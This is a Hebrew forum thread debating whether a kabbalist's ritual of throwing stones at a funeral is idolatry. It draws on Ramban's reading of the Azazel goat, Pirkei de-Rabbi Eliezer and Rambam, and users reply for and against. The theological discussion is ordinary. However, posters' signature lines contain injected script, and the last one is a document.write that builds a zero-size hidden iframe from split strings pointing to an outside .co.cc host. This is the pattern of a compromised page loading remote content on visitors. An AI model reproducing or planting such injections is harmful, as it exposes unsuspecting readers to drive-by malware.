בית פורומים עצור כאן חושבים

המזיקים של המקובלים: עבודה זרה בשם המסורת

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-28/1/2017 23:41 לינק ישיר 
המזיקים של המקובלים: עבודה זרה בשם המסורת

אתחיל בציטוט מהפורום השכן:

המקובל הרב קוק מטבריה הורה לזרוק אבנים אחר הלוויה • צפו

להבין את הסיבה אולי קשה לנו, אך על פי הוראת המקובל "בגלל הסיטרא אחרא" יש לזרוק אבנים אחר ההלויה של חשוך הבנים

ביום שישי נערכה בטבריה מסע הלווית הרב אברהם אוזן ז"ל, מאנשי החסד בעיר. רבי אברהם נפטר ללא שהותיר אחריו זרע של קיימא

במסע הלוויה שנערך בבית העלמין בעיר, השתתף מורו ורבו המקובל הצדיק רבי דב קוק. לאחר מסע ההספד הורה הרב לזרוק אבנים, להיזהר שלא יפגעו באף אחד, ולכוון שזה "החלק של הסיטרא אחרא". אחר כך לומר את הפסוק "ולבני הפילגשים אשר לאברהם נתן אברהם מתנת וישלחם מעל יצחק בנו בעודנו חי קדמה אל ארץ קדם". 

ואכן הרב קוק ותלמידיו שהשתתפו במסע הלוויה זרקו אבנים לשטח הריק שבבית העלמין בטבריה

הרב אוזן ז"ל היה יהודי מיוחד שלא הותיר אחריו ילדים וגולשי 'בחדרי חרדים' מתבקשים ללמוד לעילוי נשמת הרב אברהם בן רבינה

'
בחדרי חרדים' בתיעוד וידאו מזריקת האבנים לאחר מסע הלוויה
http://www.bhol.co.il/forums/topic.asp?cat_id=4&topic_id=3129430&forum_id=771

עד כאן ציטוט.

למה אני מביא זאת? מפני שאסור לשתוק:

זו עבודה זרה.

ועכשו צריך להסביר למה ומהיכן למדנו זאת. ואז מתבקש לשאול איך יהודי שנחשב לצדיק תמים קורא ליהודים אחרים לבצע פולחן כזה...

(התלבטתי אם לכתוב. אני מאד חושש שחלק מאלו שהיו מוכנים פעם לקרוא את דברי ולהתייחס אליהם, ללמוד מהם, יסכמו סופית שאסור להקשיב לי, שאני ראוי לכל ההאשמות שהוטחו בי. ובכל זאת, איך אפשר לשתוק?)

דווח על תוכן פוגעני

נשלח ב-28/1/2017 23:42 לינק ישיר 

הרמב"ם והרמב"ן

עד כמה שידוע לי, זה מתחיל ממחלוקת הרמב"ם והרמב"ן.

ואם נחזור יותר אחורה, זה מתחיל מאחת העבודות של יום הכיפורים.

אני מעתיק בדילוגים:

(ג) בְּזֹאת יָבֹא אַהֲרֹן אֶל הַקֹּדֶשׁ ...

(ה) וּמֵאֵת עֲדַת בְּנֵי יִשְׂרָאֵל יִקַּח שְׁנֵי שְׂעִירֵי עִזִּים לְחַטָּאת וְאַיִל אֶחָד לְעֹלָה:

...

(ז) וְלָקַח אֶת שְׁנֵי הַשְּׂעִירִם וְהֶעֱמִיד אֹתָם לִפְנֵי יְדֹוָד פֶּתַח אֹהֶל מוֹעֵד:

(ח) וְנָתַן אַהֲרֹן עַל שְׁנֵי הַשְּׂעִירִם גֹּרָלוֹת גּוֹרָל אֶחָד לַידֹוָד וְגוֹרָל אֶחָד לַעֲזָאזֵל:

(ט) וְהִקְרִיב אַהֲרֹן אֶת הַשָּׂעִיר אֲשֶׁר עָלָה עָלָיו הַגּוֹרָל לַידֹוָד וְעָשָׂהוּ חַטָּאת:

(י) וְהַשָּׂעִיר אֲשֶׁר עָלָה עָלָיו הַגּוֹרָל לַעֲזָאזֵל יָעֳמַד חַי לִפְנֵי יְדֹוָד לְכַפֵּר עָלָיו לְשַׁלַּח אֹתוֹ לַעֲזָאזֵל הַמִּדְבָּרָה:

...

(טו) וְשָׁחַט אֶת שְׂעִיר הַחַטָּאת אֲשֶׁר לָעָם וְהֵבִיא אֶת דָּמוֹ אֶל מִבֵּית לַפָּרֹכֶת וְעָשָׂה אֶת דָּמוֹ כַּאֲשֶׁר עָשָׂה לְדַם הַפָּר וְהִזָּה אֹתוֹ עַל הַכַּפֹּרֶת וְלִפְנֵי הַכַּפֹּרֶת:

(טז) וְכִפֶּר עַל הַקֹּדֶשׁ מִטֻּמְאֹת בְּנֵי יִשְׂרָאֵל וּמִפִּשְׁעֵיהֶם לְכָל חַטֹּאתָם וְכֵן יַעֲשֶׂה לְאֹהֶל מוֹעֵד הַשֹּׁכֵן אִתָּם בְּתוֹךְ טֻמְאֹתָם:

(כ) וְכִלָּה מִכַּפֵּר אֶת הַקֹּדֶשׁ וְאֶת אֹהֶל מוֹעֵד וְאֶת הַמִּזְבֵּחַ וְהִקְרִיב אֶת הַשָּׂעִיר הֶחָי:

(כא) וְסָמַךְ אַהֲרֹן אֶת שְׁתֵּי ידו יָדָיו עַל רֹאשׁ הַשָּׂעִיר הַחַי וְהִתְוַדָּה עָלָיו אֶת כָּל עֲוֹנֹת בְּנֵי יִשְׂרָאֵל וְאֶת כָּל פִּשְׁעֵיהֶם לְכָל חַטֹּאתָם וְנָתַן אֹתָם עַל רֹאשׁ הַשָּׂעִיר וְשִׁלַּח בְּיַד אִישׁ עִתִּי הַמִּדְבָּרָה:

(כב) וְנָשָׂא הַשָּׂעִיר עָלָיו אֶת כָּל עֲוֹנֹתָם אֶל אֶרֶץ גְּזֵרָה וְשִׁלַּח אֶת הַשָּׂעִיר בַּמִּדְבָּר:

...

(כו) וְהַמְשַׁלֵּחַ אֶת הַשָּׂעִיר לַעֲזָאזֵל יְכַבֵּס בְּגָדָיו וְרָחַץ אֶת בְּשָׂרוֹ בַּמָּיִם וְאַחֲרֵי כֵן יָבוֹא אֶל הַמַּחֲנֶה:

...

(כט) וְהָיְתָה לָכֶם לְחֻקַּת עוֹלָם בַּחֹדֶשׁ הַשְּׁבִיעִי בֶּעָשׂוֹר לַחֹדֶשׁ תְּעַנּוּ אֶת נַפְשֹׁתֵיכֶם וְכָל מְלָאכָה לֹא תַעֲשׂוּ הָאֶזְרָח וְהַגֵּר הַגָּר בְּתוֹכְכֶם:

(ל) כִּי בַיּוֹם הַזֶּה יְכַפֵּר עֲלֵיכֶם לְטַהֵר אֶתְכֶם מִכֹּל חַטֹּאתֵיכֶם לִפְנֵי יְדֹוָד תִּטְהָרוּ:

(פרשת אחרי מות)

הפרשה עוסקת ביום הכיפורים, היום שבו נמחלים כל עוונותינו. וביום הזה, בין מעשי הקרבנות של כהן גדול, יש גם הפרשת שעיר (זכר העיזים, תיש) שלאחר שהוגרל לתפקיד, ולאחר שהכהן מתוודה עליו את חטאי בני ישראל, הוא אינו קרב לקרבן אלא נשלח אל המדבר. "לעזאזל".

יש כאן כמה שאלות מציקות, ואני מסכם בקצרה.

ראשית, מה זה "עזאזל"?

יש להודות כי המילה אינה מוכרת ויש לגביה השערות שונות. חז"ל פירשו שהשעיר הזה נלקח לראש הר ונדחף למטה עד שהוא נעשה "איברים איברים".

חכמינו אם כן פירשו (או יצרו פירוש – למי שמעדיף גישה כזו) לפיו ה"עזאזל" הוא פשוט מקום גבוה שממנו יושלך השעיר ואיתו העוונות. אפשר לפרש זאת באופן סמלי, בתור טכס שיש לו מניעים אנתרופולוגיים. המתעקש יוכל לטעון שיש כאן לקיחה בפועל של העוונות הקיימים ברמה אונטולוגית כלשהי והעברתם למקום אחר כדי להציל את מי שנשאר כאן, ויש מקבילות לכך בטכסי עמים באותה תקופה.

לפי הגישה שאפשר לייחס לרמב"ם, אין ממשות לעבירות. זה הכל סמלים. כדי לחוש אותו נקיון פסיכולוגי של טהרה מעבירות הן מורחקות למקום הרחוק ביותר.

אבל גם אם מישהו ירצה לחלוק על הרמב"ם, והרי הרמב"ם הוא רק פרשן, יש לשים לב: לפי חז"ל, , העוונות נשמדים עם השעיר. השעיר אבד. הוא בוודאי לא סוג של קרבן לישות כלשהי, חלילה וחס.

אבל יש גם מקורות אחרים, לצערנו. כן, לצערנו!

דדווח על תוכן פוגעני

נשלח ב-28/1/2017 23:43 לינק ישיר 

עבודה זרה בשם התורה

כאן עלי לתקוף אחד הגדולים והמפורסמים שבכל הדורות. מסתבר שהיה עלי לפחד יותר לצאת נגדו. אבל אני גם חושב שאסור לשתוק. וכיון שאני מאמין שהתורה אמת, ויש עולם הבא, אני סבור שאותו אדם גדול ישמח בכך שאתקן את דבריו.

מיהו אותו אדם גדול שטועה ומטעה?

רבי משה בן נחמן, הרמב"ן.

איך זה? כך.

לפי הרמב"ן, השעיר הוא קרבן לישות אלילית שקיימת במציאות. שר המדבר.

צוה הקדוש ברוך הוא ביום הכפורים שנשלח שעיר במדבר לשר המושל במקומות החרבן, והוא הראוי לו מפני שהוא בעליו

(רמב"ן פרשת אחרי מות וכל הציטוטים משם, פרק טז ח)

ואם תשאלו את הרמבן איך אפשר להביא קרבן כזה, הרי זו עבודה זרה. הוא יענה:

ואין הכונה בשעיר המשתלח שיהיה קרבן מאתנו אליו חלילה, אבל שתהיה כונתנו לעשות רצון בוראנו שצונו כך:

והמשל בזה, כמי שעשה סעודה לאדון וצוה האדון את האיש העושה הסעודה תן מנה אחת לעבדי פלוני, שאין העושה הסעודה נותן כלום לעבד ההוא ולא לכבודו יעשה עמו, רק הכל נתן לאדון והאדון נותן פרס לעבדו, ושמר זה מצותו ועשה לכבוד האדון כל אשר צוהו, ואמנם האדון לחמלתו על בעל הסעודה רצה שיהיו כל עבדיו נהנין ממנה שיספר בשבחו ולא בגנותו:

הרמב"ן אם כן מודע לכך שיש בעייתיות בפירוש שלו. והוא עונה תשובה בת שני חלקים.

קודם כל: אסור להביא קרבן כזה. חלילה.

שנית, ה' בעצמו אמר להביא את השעיר בתור "מנה" לשר המדבר, שסוף סוף הוא עבד ה'.

והנה, אמנם הרמב"ן כאן אינו כותב שהעבירות קיימות במציאות וצריך להוביל אותן, אבל הוא בהחלט מאשר את קיומם של מלאכים, מזיקים ועוד.

אותו עזאזל מדברי הוא ישות רבת תפקידים. הנה כך כותב אודותיו הרמב"ן, אודות אותו "שר המושל במקומות החרבן"

... מאצילות כחו יבא חורב ושממון

כי הוא העילה לכוכבי החרב והדמים והמלחמות והמריבות והפצעים והמכות והפירוד והחרבן,

והכלל נפש לגלגל מאדים,

וחלקו מן האומות הוא עשו שהוא עם היורש החרב והמלחמות,

ומן הבהמות השעירים והעזים,

ובחלקו עוד - השדים הנקראים מזיקין בלשון רבותינו,

סיכום ההנחות האונטולוגיות (הטענות או המשפטים לגבי מה שיש במציאות):

יש מזיקים.

יש שליטה של כוכבים.

יש ממונה על שהוא שר המדבר ומאציל דברים רעים לישים רעים.

דדווח על תוכן פוגעני

נשלח ב-28/1/2017 23:43 לינק ישיר 

הרמב"ן מול פרקי דר' אליעזר

אבל למען האמת זה מתחיל לפני הרמב"ן.

דברי הרמב"ן אינם המצאה שלו. הוא מצא אותם בחיבור עתיק יותר, המיוחס לרבי אליעזר.

ומפורש מזה בפרקי רבי אליעזר הגדול (פרק מו),

לפיכך היו נותנין לו לסמאל שוחד ביום הכפורים שלא לבטל את קרבנם,

שנאמר גורל אחד לה' וגורל אחד לעזאזל,

גורלו של הקדוש ברוך הוא לקרבן עולה, וגורלו של עזאזל שעיר החטאת וכל עונותיהם של ישראל עליו, שנאמר ונשא השעיר עליו.

בהמשך הציטוט מתבאר שיש סמאל שהנתינה הזו משכנעת אותו ללמד סנגוריה על עם ישראל ואז הכל בסדר. ראו שם ברמב"ן ושם בפרקי דר' אליעזר.

למעשה, הרמב"ן מוסיף משלו על המוכר לנו מפרקי דר' אליעזר

אני מעתיק מהמקור כפי שהוא בפרוייקט השו"ת.

אמ' סמאל לפני הב"ה

רבון כל העולמים

על כל אומות העולם נתת לי רשות ועל ישראל אין אתה נותן לי,

אמ' לו הרי יש לך רשות עליהם ביום הכפורים אם יש להם חטא, ואם לאו אין לך רשות עליהם,

לפי' נותנין לו שוחד ביום הכפורים שלא לבטל את ישראל שלא יקריבו את קרבנם,

(פרקי דרבי אליעזר (היגר) - "חורב" פרק מה)

ובכן, סמאל הוא כנראה מלאך ולא מזיק, ויש לו מעמד בשמים ויש לו סמכות על אומות העולם אבל לא על ישראל. אבל יש לו סמכות לבחון את עם ישראל ביום הכיפורים כדי לקבל רשות לפגוע בהם.

כאן המיתוס של פדר"א משלב שני רעיונות. ראשית, השעיר הוא מתנה, שוחד, לסמאל. שנית, כיון שהשעיר נושא את עוונותיהם עם ישראל הופכים לנקיים. וסמאל מודה אחר כך שהם נקיים.

מה המנגנון שפועל כאן לא ברור, לפחות לא לי. אפשר להציע פרשנויות, וכבר ציטטתי את דברי הרמב"ן. אני רק מבקש להדגיש שהפרשנות של הרמב"ן מוסיפה על פדר"א ומדגישה את הפן של מתנה ושל עבודה זרה שיש בה. כמו כן, סמאל הופך כאן ליצור שאינו חלק מן הפמליה של מעלה. אם השטן בספר איוב הוא קטגור שאוסף תלונות על בני אדם, הסמאל של הרמב"ן הוא כבר ישות שאינה נמצאת בשמים אלא נלחמת נגדם. מסתבר לי שהרעיון הזה נלקח בידי הרמב"ן מן הספרים החיצוניים, שלא ידע לזהותם כספרי כתות. אבל הדברים זקוקים לבירור ארוך וגם כך הדברים ארוכים...

רק הערה קטנה על החיבור. הספר מאוחר ולפחות חלקו נכתב בימים שהאיסלם כבר היה קיים. אבל קשה להבדיל בו מה עתיק ומה חדש. לדעתי מדובר בספר שמושפע או החל להווצר בימי כתות כמו כת קומראן. כאמור, בלי מחקר שיטתי יהיה קשה להצדיק טענה כזו.

המוזר ביותר הוא שהרמב"ם מתייחס לחיבור הזה כאל מקור חז"לי ואף מצטט ממנו במורה נבוכים ומפרש אותו קטע (בהקשר אחר לגמרי) לפי הפילוסופיה האריסטוטלית.

האם זה נותן הכשר למיתוס על סמאל? האם זה מצדיק את הרמב"ן ופירושו?

דדווח על תוכן פוגעני

נשלח ב-28/1/2017 23:44 לינק ישיר 

האם יכולה להיות מצוה להקריב עבודה זרה?

זו באמת השאלה. כלומר, יש שאלה לגבי האונטולוגיה: האם יש מזיקים, סמאל, מלאכים? האם אפשר לתת שוחד למלאך או לסמאל?

ויש שאלה של הלכה וטעמן של מצוות. האם יתכן שתהיה מצוה של ה' לתת שוחד למזיק, ליצור שטני?

כאן אעסוק בשאלה השניה.

דברי הרמב"ם ברורים מאד. הטעות הזו הובילה לכל עבודה זרה שהיתה אי פעם.

הלכה א

בימי אנוש טעו בני האדם טעות גדול ונבערה עצת חכמי אותו הדור ואנוש עצמו מן הטועים היה, וזו היתה טעותם, אמרו הואיל והאלהים ברא כוכבים אלו וגלגלים להנהיג את העולם ונתנם במרום וחלק להם כבוד והם שמשים המשמשים לפניו ראויין הם לשבחם ולפארם ולחלוק להם כבוד, וזהו רצון האל ברוך הוא לגדל ולכבד מי שגדלו וכבדו, כמו שהמלך רוצה לכבד העומדים לפניו וזהו כבודו של מלך, כיון שעלה דבר זה על לבם התחילו לבנות לכוכבים היכלות ולהקריב להן קרבנות ולשבחם ולפארם בדברים ולהשתחוות למולם כדי להשיג רצון הבורא בדעתם הרעה, וזה היה עיקר עבודת כוכבים,

(רמב"ם הלכות עבודה זרה פרק א)

את הדברים החדים של הרמב"ם נגד מי שיסית לעבודה זרה בשם ה' אפשר למצוא בפירוש המשניות (לא מצאתי כרגע במשנה תורה ולא זכור לי שם).

טועני הנבואה נחלקים תחלה לשני חלקים, מתנבא בשם עבודה זרה, או מתנבא בשם ה'.

והנבואה בשם ע"ז לשני חלקים.

החלק הראשון שיקום נביא ויאמר שכוכב פלוני השרה עלי רוחניותו, ואמר לי עבדוני בכך או דרשוני בכך. וכן אם קרא לעבודת פסל או צורה מן הצורות ואמר שהוא נבא אותי בכך, והודיעני בכך, או צוני להזהיר על עבודתו באופן פלוני כמו שהיו עושים נביאי הבעל ונביאי האשרה.

והחלק השני, שיאמר חזון נראה אלי מה' לעבוד נעבד פלוני, או להוריד רוחניות פלונית באופן פלוני ויאמר אופן מאופני העבודה והמעשים שעושים אנשי אותו הסוג כפי הכללים הידועים בתורתינו, הרי גם זה מתנבא בשם ע"ז.

לפי ששם זה כולל האומר שהיא בעצמה צותה על עבודתה או באיזה דבר שיהיה או האומר שה' צוה לעבוד איזה נברא.

זה האיסור. והנה העונש:

כאשר נשמע מהמתנבא אחת משתי הנבואות האלה, ונתקיימה עליו העדות כפי דין תורה, הרי דינו שיומת בחנק כמו שאמר יתעלה והנביא ההוא או חולם החלום ההוא יומת. ואין לחוש לנבואתו ולא נבקש ממנו מופת,

ושום אדם אינו פטור מן הדין הזה, ולו גם יהיה תלמיד חכם, או להבדיל "מקובל", ואפילו יהיה נביא, ואפילו יביא מופתים.

ואפילו עשה מופתים אשר לא שמענו מופלאים כמותם כדי לאמת דברו הרי זה נחנק ואין לחוש לאותם המופתים, לפי שסבת קיום אותם המופתים מה שאמר הכתוב כי מנסה ה' אלקיכם אתכם וכו', כי עדות השכל המכחישה את נבואתו גדולה מכח עדות העין הרואה מופתיו, לפי שכבר נתברר אצל בעלי השכל שאין ראוי לכבד ולא לעבוד זולת היחיד שהמציא כל המציאות ונבדל בתכלית השלמות

(הקדמת הרמב"ם למשנה)

זה לא יפה לומר זאת על אחד מתלמידי החכמים הגדולים בכל הדורות, שחידושיו נלמדים בכל הישיבות, הלא הוא רבי משה נחמני, אבל דברי הרמב"ם חלים עליו. אילו היה חי בינינו, ואילו היתה סנהדרין נוהגת לפי הרמב"ם, היה אותו האיש חייב מיתה.

כן. כן.

דדווח על תוכן פוגעני

נשלח ב-28/1/2017 23:45 לינק ישיר 

מהרמב"ן ועד למקובלים החדשים

מן הסתם אפשר לשרטט את התפתחות הרעיון של הרמב"ן. הוא מאומץ בזוהר ובקבלה שאחריו.

האם התבוננתם אי פעם בסידור או בברכון של זמירות שבת? האם שמתם לב לניסוח שאותו אמור יהודי לומר לפני שהוא נוטל מים אחרונים, המיועדים להעביר את הלכלוך מן האצבעות לאחר האכילה, אבל פרשנים קבליים הפכו זאת לטכס שמפרישים בו חלק לסטרא אחרא?

והנה, הטכס הזה חוזר במהלך הלוויתו של פלוני כאשר אדם שמחזיק מעצמו כמקובל קורא לתת את החלק לסטרא אחרא גם שם, בהלוויה. הכל לטובת נשמתו של הנפטר ועל פי תורת הסוד.

דדווח על תוכן פוגעני

נשלח ב-28/1/2017 23:47 לינק ישיר 

דינים העולים ותחינת כותב שורות אלו

הלוואי והייתי יכול להאמין שדברי יתקבלו. אני יכול לקוות שדברי יישמעו או לפחות יהוו אתגר, תורני ואינטלקטואלי.

אני מקוה שהלומד יעיין במקורות. הם ארוכים והם עדיין אינם ממצים. אבל השתדלתי לכתוב קריא.

אני מסכם:

לפי הרמב"ם, כל האומר בשם אלוקים שיש מצוה לתת קרבן לישות אחרת מלבדו, ובוודאי לישות כמו "מזיק" או "שר מזיקים", הרי זה קורא לעבודה זרה וחייב מיתה. וגם אם אותו מסית מדבר בשם התורה, בשם הנבואה, בשם אלוקים. וגם אם יש לו מופתים שביצע.

לפי הרמב"ן, יש מצוה להביא בכל יום הכיפורים מנחה לישות שנקראת עזאזל. מה יאמר על זה הרמב"ם?

לפי מקובלים חדשים יותר, טכסים כאלו שייכים גם בזמן הזה, אם בזמן לוויה שצריך לתת חלק לסטרא אחרא, ואם לפני ברכת המזון לאותו יעד.

מה הרמב"ם היה אומר עליהם?

האם זה רק הרמב"ם שחושב כך על גישה כזו של הרמב"ן והמקובלים?

חלילה שאקרא להרוג מישהו בשל עבודה זרה שהיא בטעות.

אבל אני קורא לחשוב, ללמוד, לבדוק.

נכון, השאלה קשה ובמיוחד כאשר מתרגלים לגישה שאנו קטנים ומי אנו שנחלוק על גדולים. אבל כבר ראינו שהגדול שבגדולים, אפילו נביא, שקרא לעבודה זרה, חייב מה שחייב.

אז נעז לחשוב ולשאול: מי צודק? איך אפשר לדעת מי צודק?

עצרו, חשבו.

אולי נחזור בתשובה.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-29/1/2017 01:48 לינק ישיר 

מיימוני

בעוד זמן קצר יתגלה מלך המשיח והאמת האלוקית תתגלה במלוא הדרה ולפי תורתו של מלך המשיח נראה שמסכים עם הזהר הקבלה והרמב"ן  ואתה לא מסכים עם הזהר והקבלה והרמב"ן ז כנראה אתה לא תמשיך את חיי הנצח עם מלך המשיח .

ובזה אני מסיים את הדיון שלי בפורם שמרבה דברי כפירה .

דדווח על תוכן פוגעני

נשלח ב-29/1/2017 01:49 לינק ישיר 

אני מסכים עם נמדשיר וכך אעשה .

דדווח על תוכן פוגעני

נשלח ב-29/1/2017 07:00 לינק ישיר 

שולחן ערוך יורה דעה שעו' סעיף ד': "ואחר כך תולשין עפר ותולשין עשבים ומשליכים אחר גוום".

אני מתפלא על כולם שלא הביאו דין זה

ובמנהגי אשכנז: כל היוצא מבית הקברות תולש עשבים וזורקם לאחור מעל ראשו, תוך אמירת לשון הפסוק בתהילים עב, טז: וְיָצִיצוּ מֵעִיר כְּעֵשֶׂב הָאָרֶץ. אם אין עשבים בבית הקברות, נוטל מעט עפר וזורקו לאחור ואומר את לשון הפסוק בתהילים קג, יד: זָכוּר כִּי עָפָר אֲנָחְנוּ.

דדווח על תוכן פוגעני

נשלח ב-29/1/2017 08:18 לינק ישיר 

נמדשיר

לפחות קראת את דברי...

ולאחר שקבעת שמלך המשיח יסכים עם הזוהר והקבלה, שאל נא את עצמך: האם קראת את תוכן הזוהר? האם אתה ער לכך שמדובר בחיבור מאוחר משלהי ימי הבינים ולא שנכתב בידי תנאים ואמוראים? אתה מוזמן לעיין באשכולות המתאימים ולהבין מדוע.

ואיך זה בעיניך יתכן שה' יצוה לתת מתנה לישות זרה הנלחמת בו? כי כך זה לפי הקבלה הדואליסטית, כלומר שמניחה שהעולם הוא זירת קרב בין האלוקים לבין נבראים שקמים נגדו?

דורש אמת

ברוך השב! לא ידעתי שאתה עדיין כאן וקורא כאן. אני מקוה שתישאר...

דדווח על תוכן פוגעני

נשלח ב-29/1/2017 08:22 לינק ישיר 

פתיאמי

הציטוט שלך אינו מעיד על כך שהכותב שלו מפרש את הטכס הזה באותו אופן שהמקובל מנהל אותו. המקובל גם מוסיף עליו לא רק פרשנות אלא גם תוספות מה לעשות.

ויש לנו כאן דוגמא למה שהמקובלים חוללו. הם לקחו מנהג והפכו אותו למצוה. והם פירשו את המנהג לפי שיטתם שהיא עבודה זרה לפי הרמב"ם.

המנהג המקורי דומה שהוא רק מזכיר לאדם את קוצר ימיו, את קוצר ימינו. אפשר היה לומר שזה מנהג המשקף גישה אקזיסטנציאליסטית (אם כי הדגש על קוצר ימי האדם - ולכן חוסר משמעותם - כבר מופיע בספרי התנ"ך כמו תהלים ומשלי וקהלת). אני משער -  מקווה - שברור המרחק בין מי שמביא את המנהג ומעניק לו גוון קיומי לבין המפרש והמוסיף המאוחר.

אם אין יכולת להבדיל בין דברים כה שונים, אז דומה שאין שום דרך לסייע לחברים כמו נמדשיר ודורש אמת להבדיל בין סוגי האמונות שהם מחזיקים בהם, בין אלו שהן מקוריות לבין אלו שהן מאוחרות. בין אלו שהן מן התורה לבין אלו שהן כפויות מתוך הנטיה הטבעית של האדם לבנות מיתוסים, שהיא מקור לעבודה זרה.

דדווח על תוכן פוגעני

נשלח ב-29/1/2017 08:38 לינק ישיר 

מיימוני
הרי אתה רואה את עצמך כאיש הלכה. כמעט כל בעלי ההלכה הגדולים מאז הרמב"ן עד ימינו (ואל תזכיר לי את תשובה מאהבה) הם או מקובלים פעילים, כגון הב"י והגר"א, או לפחות אוהדים. אם בתור בעלי הלכה הם סברו שקבלה היא לא ע"ז, אולי באמת הלכתית היא לא עבודה זרה?

דדווח על תוכן פוגעני

נשלח ב-29/1/2017 08:43 לינק ישיר 

הרב מיימוני:

אני מנסה להדגיש נקודה אחרת. (זה לא שאין דרך להבדיל בין תלישת עשבים והשתוללותו של הקוק)

הרמב"ם כשל. במבחן ההסטוריה, חד וחלק.

אמנם אפשר לומר שהיתה לו הצלחה חלקית, אבל איך אמר גרשם שולם? המיתוס צץ ועולה אחר ההדחקה.

ובנימה של אבלות והספד:

צר לי הרב מיימוני, היהדות הרציונלית כבר חלפה מהעולם מזמן על ידי יוצרי ה"חרדיות" (ה"חזון איש" וממשיכיו)

דדווח על תוכן פוגעני

נשלח ב-29/1/2017 08:56 לינק ישיר 

פתי
המנגינה של ההספד נשמעת מצויין, אמחייע.

מיימוני יטען שהחזון איש היה רציונלי שהאמין באוטונומיה של השכל, אבל כבר לא מהיום טענתי שהחזון לא האמין באוטונומיה של השכל שלנו, אלא בשכל של חז"ל והקדמונים, וראה אמונה ובטחון פרק ה.

תוקן על ידי בעלבעמיו ב- 29/01/2017 08:56:37

דדווח על תוכן פוגעני

נשלח ב-29/1/2017 09:37 לינק ישיר 

מיימוני כתב:
נמדשיר

לפחות קראת את דברי...

ולאחר שקבעת שמלך המשיח יסכים עם הזוהר והקבלה, שאל נא את עצמך: האם קראת את תוכן הזוהר? האם אתה ער לכך שמדובר בחיבור מאוחר משלהי ימי הבינים ולא שנכתב בידי תנאים ואמוראים? אתה מוזמן לעיין באשכולות המתאימים ולהבין מדוע.

לא אני קבעתי מה מלך המשיח יסכים , אלא מלך המשיח בעצמו כך אומר בדבריו , וכל המחקרים שנכתבו באשכולןת לא מוכיחים כלום אלא מגלים רק את חוסר המידע שהיה לחוקרים .

ואיך זה בעיניך יתכן שה' יצוה לתת מתנה לישות זרה הנלחמת בו? כי כך זה לפי הקבלה הדואליסטית, כלומר שמניחה שהעולם הוא זירת קרב בין האלוקים לבין נבראים שקמים נגדו?

בס"ד

באיכה ג ל כתוב מִפִּי עֶלְיוֹן לֹא תֵצֵא הָרָעוֹת וְהַטּוֹב. כשנבחין בטעמים  (שהחלק הראשון מפי עליון לא תצא הוא פשטא קטון  , והחלק השני הוא מרכא סוף פסוק )נראה שהקריאה היא מפי עליון לא תצא , הרעות והטוב , והכוונה שמפי עליון אין רע וטוב .

מצד שני בחומש דברים ל ט"ו כתוב ראה נתתי לפניך היום, את-החיים ואת-הטוב, ואת-המוות, ואת-הרע.

נציב כמה שאלות :

1.      לכאורה הפסוקים סותרים באיכה כתוב שהרע והטוב זה לא מבורא עולם , ובדברים כתוב שגם הטוב וגם הרע הוא מבורא עולם ?

2.      כידוע שבורא עולם ברא את העולם כדי להיטיב ומהטוב יוצא טוב ואיך התורה כותבת נתתי את הטוב ואת הרע ?

3.      איך באמת אדם יכול לבחור רע  שזהו נגד רצון הבורא ? וכי יש 2 רשויות ?

הפוסט נועד כדי לענות על השאלות שהצגנו .

עלינו לדעת שענין הרצון של הבורא הוא דבר שנוצר רק לאחר הצמצום והכוונה שלפני הצמצום לא שייך שום הגדרה לא רצון לא רע לא טוב וכל הגדרה אחרת .

ולכן הצמצום הראשון שנוצר זה הרצון לברוא עולם כדי להיטיב לבריותיו ובקבלה זה נקרא כתר , והצמצום עצמו כדי שיוכל להגדיר את ענין הטוב היה חייב להיווצר טוב ורע כדי שהטוב יוגדר כמו שכבר כתב קהלת  וְרָאִיתִי אָנִי שֶׁיֵּשׁ יִתְרוֹן לַחָכְמָה מִן הַסִּכְלוּת, כִּיתְרוֹן הָאוֹר מִן הַחֹשֶׁךְ.

והכוונה שכדי להכיר את האור או את החכמה לא שייך להכיר אלא מתוך החושך או הסכלות , ולעינינו  לולא הרע הטוב לא היה ניכר , או במילים אחרות כשי שיוכר הטוב יש גם ליצור רע , ורק כשיש רע וטוב אפשר להכיר בטוב .

היוצא לנו עד כאן שלפני הצמצום לא היה שייך רע וטוב , ולאחר הצמצום כדי שיוכר הטוב היה חייב לצאת גם הרע .

והרי כתבנו שהרצון נוצר לאחר הצמצום , הרי לנו שהרצון לטוב הוא הוא מצב שנוצר לאחר הצמצום אבל לפני הצמצום לא שייך כל רצון לא לרע ולא לטוב.

אחרי ההקדמה שכתבנו נבוא לבאר את השאלות :

הפסוק באיכה מדבר על השרש שלפני הצמצום ולכן כתוב מפי עליון הכוונה שאין ממקום לא מוגדר שלכן נקרא עליון משם לא יוצא לא טוב ולא רע , היות ומפי עליון זה מלפני הצמצום .

לעומת הפסוק בדברים ששם כתוב ראה נתתי וגו' שברור שהכוונה לאחר הצמצום ששם אפשר לומר נתתי  , וגם לאחר הצמצום שייך לומר רע וטוב .

נשאר לנו רק להשיב איך בורא עולם אומר נתתי את הטוב ואת הרע , הרי הטוב מטיב ולא מריע , אבל בדיוק כאן טמונה התשובה בגלל הצמצום נוצר מצב טוב ורע , וזה הכוונה נתתי לפניך את הטוב ואת הרע , ובורא עולם מצווה בחרת בטוב , והכוונה שלאחר הצמצום שנוצר טוב ורע ונוצר הרצון מתגלה הרצון של בורא עולם שנבחר בטוב , אבל ברור שגם האפשרות לרע הגיע מהמקום שאין בו הגדרה לטוב ורע  והבחירה של האדם ברע נכון שהיא בחירה נגד הרצון שנוצר בצמצום , אבל זה לא נגד האפשרויות שקיימות אצל בורא עולם מלפני הצמצום , ולכן הבחירה ברע היא נגד הרצון אבל לא נגד בורא עולם שלפני הצמצום , וממילא מיושבת השאלה איך אפשר לבחור ברע שזה נגד רצונו , שזה לא שני רשויות  אלא זה בחירה שהיא באה מהאפשרות שלפני הצמצום שנוצרה על ידי הצמצום 

זה פוסט שאני כתבתי . אם הבנת טוב ואם לא הבנת אל תדבר על גדולים ממך שאתה לא מתחיל להבין את דבריהם שאני הקטן רק מנסה לסבר את האוזן להבנת דבריהם 

דורש אמת

ברוך השב! לא ידעתי שאתה עדיין כאן וקורא כאן. אני מקוה שתישאר...

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

דדווח על תוכן פוגעני

